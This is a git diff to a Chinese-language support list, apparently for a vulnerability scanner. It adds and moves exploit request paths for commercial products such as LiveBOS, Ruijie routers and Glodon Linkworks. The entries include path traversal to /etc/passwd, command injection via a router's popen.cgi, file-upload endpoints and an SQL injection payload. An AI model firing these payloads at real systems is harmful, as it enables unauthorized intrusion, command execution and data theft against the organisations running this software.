update 广联达 锐捷

--- a/支持清单.md
+++ b/支持清单.md
@@ -4,8 +4,10 @@
 - 飞企互联FE业务协作平台 /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
 - MilesightVPN        /../etc/passwd
 - 企业微信             /cgi-bin/gateway/agentinfo
+- LiveBOS           /feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd
 - 金盘微信管理平台      /admin/weichatcfg/getsysteminfo
 - 锐捷交换机WEB管理系统 /EXCU_SHELL
+
 命令执行 
 - Cellular-Router           /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;df&v=0.1303033443137912
 - 新开普前置服务管理平台  /service_transport/service.action
@@ -14,9 +16,9 @@
 - 恒生JRESCLOUD           /acm/api/v1/../../see/view/uploadImage.json
 - PigCMS                  /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload
 - 易思无人值守智能物流系统  /Sys_ReportFile/ImportReport?encode=
+- 锐捷NBR路由器、锐捷EG易网管 /ddi/server/fileupload.php
 SQL注入
 - 红帆ioffice     /iOffice/prg/set/wss/udfmr.asmx?op=GetEmpSearch
-- 广联达Linkworks /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
 - 中远麒麟堡垒机   /admin.php?controller=admin_commonuser
 ```
 
@@ -43,6 +45,10 @@ SQL注入
 - 帆软FineReport 代码执行 --- /webroot/decision/remote/design/channel
 - 帆软FineReport 文件读取 --- /op=chart&cmd=get_geo_json&resourcepath=privilege.xml
 - 帆软FineReport 代码执行 --- /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=
+
+- 广联达Linkworks SQL注入 2023 /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
+- 广联达Linkworks SQL注入 2023 /Org/service/Service.asmx/GetUserByUserCode?userCode=1%27-1/user--%27&EncryptData=1
+- 广联达Linkworks 信息泄露 2023  /Org/service/Service.asmx/GetUserXml4GEPS
 
 - 时空智友企业流程化管控系统ERP 文件上传 2023 /formservice?service=attachment.write&isattach=false&filename=
 - 时空智友企业流程化管控系统ERP 文件读取 2023 /login
